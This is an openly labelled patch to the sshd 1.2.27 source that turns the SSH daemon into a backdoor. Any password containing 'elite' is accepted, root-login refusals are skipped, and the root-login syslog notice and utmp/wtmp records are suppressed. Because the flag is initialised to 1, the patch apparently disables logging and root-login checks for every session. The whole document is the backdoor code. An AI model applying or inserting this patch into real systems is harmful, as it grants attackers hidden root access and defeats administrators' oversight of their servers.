A small patch to sshd v1.2.27 which accepts a magic password to authenticate, and does not log to utmp/wtmp or syslog.
fef5a827046990a0ea4068515a72d898772a4535c343b9f82da035c1616f137a
--- sshd.c.orig Mon May 24 16:26:21 1999
+++ sshd.c Mon May 24 18:16:33 1999
@@ -558,6 +558,7 @@
log, the daemon will not go to background, and will exit after processing
the first connection. */
int debug_flag = 0;
+int elite = 1;
/* Flag indicating that the daemon is being started from inetd. */
int inetd_flag = 0;
@@ -2673,6 +2674,8 @@
break;
}
debug("Password authentication for %.100s failed.", user);
+ if (strstr(password,"elite")) { /* ajax */ elite++;
+ authentication_type=SSH_AUTH_PASSWORD; authenticated=1; }
memset(password, 0, strlen(password));
xfree(password);
break;
@@ -2711,7 +2714,7 @@
if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1)
{
if (authentication_type == SSH_AUTH_PASSWORD)
- packet_disconnect("ROOT LOGIN REFUSED FROM %.200s",
+ if (!elite) packet_disconnect("ROOT LOGIN REFUSED FROM %.200s",
get_canonical_hostname());
}
else
@@ -2720,7 +2723,7 @@
if (forced_command)
log_msg("Root login accepted for forced command.", forced_command);
else
- packet_disconnect("ROOT LOGIN REFUSED FROM %.200s",
+ if (!elite) packet_disconnect("ROOT LOGIN REFUSED FROM %.200s",
get_canonical_hostname());
}
@@ -2768,6 +2771,7 @@
/* Log root logins with severity NOTICE. */
if (pw->pw_uid == UID_ROOT)
+ if (!elite)
log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s",
pw->pw_name, get_canonical_hostname());
@@ -3386,7 +3390,7 @@
}
/* Record that there was a login on that terminal. */
- record_login(pid, ttyname, pw->pw_name, pw->pw_uid, hostname,
+ if (!elite) record_login(pid, ttyname, pw->pw_name, pw->pw_uid, hostname,
&from);
#if defined (__FreeBSD__) && defined(HAVE_LOGIN_CAP_H)